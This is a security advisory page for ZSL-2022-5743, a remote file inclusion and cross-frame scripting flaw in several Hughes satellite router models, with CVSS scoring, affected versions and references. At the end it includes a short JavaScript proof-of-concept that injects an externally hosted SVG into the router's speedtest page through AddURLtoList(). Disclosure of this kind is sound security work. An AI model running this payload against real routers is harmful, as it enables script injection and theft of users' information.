Lucene search

K
zeroscienceGjoko KrsticZSL-2022-5743
HistoryDec 28, 2022 - 12:00 a.m.

Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting

2022-12-2800:00:00
Gjoko Krstic
zeroscience.mk
253
hughes satellite router
remote file inclusion
cross-frame scripting
security bypass
sensitive information
exploit
router vulnerability
ip connectivity
quality of service
remote router

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.0%

Title: Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting
Advisory ID: ZSL-2022-5743
Type: Local/Remote
Impact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting
Risk: (4/5)
Release Date: 28.12.2022

Summary

The HX200 is a high-performance satellite router designed to provide carrier-grade IP services using dynamically assigned high-bandwidth satellite IP connectivity. The HX200 satellite router provides flexible Quality of Service (QoS) features that can be tailored to the network applications at each individual remote router, such as Adaptive Constant Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing. With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT, and DNS Server/Relay functionality, together with a high-performance satellite modem, the HX200 is a full-featured IP Router with an integrated high-performance satellite router. The HX200 enables high- performance IP connectivity for a variety of applications including cellular backhaul, MPLS extension services, virtual leased line, mobile services and other high-bandwidth solutions.

Description

The router contains a cross-frame scripting via remote file inclusion vulnerability that may potentially be exploited by malicious users to compromise an affected system. This vulnerability may allow an unauthenticated malicious user to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application.

Vendor

Hughes Network Systems, LLC - <https://www.hughes.com>

Affected Version

HX200 v8.3.1.14
HX90 v6.11.0.5
HX50L v6.10.0.18
HN9460 v8.2.0.48
HN7000S v6.9.0.37

Tested On

WindWeb/1.0

Vendor Status

N/A

PoC

hughes_rfi_xfs.js
speedtest.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://packetstormsecurity.com/files/170343/&gt;
[2] <https://forum.it.mk/threads/hughes-satellite-router-remote-file-inclusion-cross-frame-scripting.82755/&gt;
[3] <https://vulners.com/cve/CVE-2023-22971&gt;
[4] <https://nvd.nist.gov/vuln/detail/CVE-2023-22971&gt;
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/245814&gt;
[6] <https://www.exploit-db.com/exploits/51190&gt;

Changelog

[28.12.2022] - Initial release
[29.12.2022] - Added reference [1] and [2]
[26.01.2023] - Added reference [3] and [4]
[10.02.2023] - Added reference [5]
[10.04.2023] - Added reference [6]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting


Vendor: Hughes Network Systems, LLC
Product web page: https://www.hughes.com
Affected version: HX200 v8.3.1.14
                  HX90 v6.11.0.5
                  HX50L v6.10.0.18
                  HN9460 v8.2.0.48
                  HN7000S v6.9.0.37

Summary: The HX200 is a high-performance satellite router designed to
provide carrier-grade IP services using dynamically assigned high-bandwidth
satellite IP connectivity. The HX200 satellite router provides flexible
Quality of Service (QoS) features that can be tailored to the network
applications at each individual remote router, such as Adaptive Constant
Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter
bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.
With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,
and DNS Server/Relay functionality, together with a high-performance
satellite modem, the HX200 is a full-featured IP Router with an integrated
high-performance satellite router. The HX200 enables high- performance
IP connectivity for a variety of applications including cellular backhaul,
MPLS extension services, virtual leased line, mobile services and other
high-bandwidth solutions.

Desc: The router contains a cross-frame scripting via remote file inclusion
vulnerability that may potentially be exploited by malicious users to compromise
an affected system. This vulnerability may allow an unauthenticated malicious
user to misuse frames, include JS/HTML code and steal sensitive information
from legitimate users of the application.

Tested on: WindWeb/1.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5743
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php


23.12.2022

--


snippet:///XFSRFI
//
// Hughes Satellite Router RFI/XFS PoC Exploit
// by lqwrm 2022
//

//URL http://TARGET/fs/dynaform/speedtest.html
//Reload target
//window.location.reload()

console.log("Loading Broadband Satellite Browsing Test");

//Add cross-frame file include (http only)
AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");

console.log("Calling StartTest()");
StartTest()

//console.log("Calling DoTest()");
//DoTest()

//Unload weapon
//document.getElementById("URLList").remove();
</p></body></html>

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.0%

Related for ZSL-2022-5743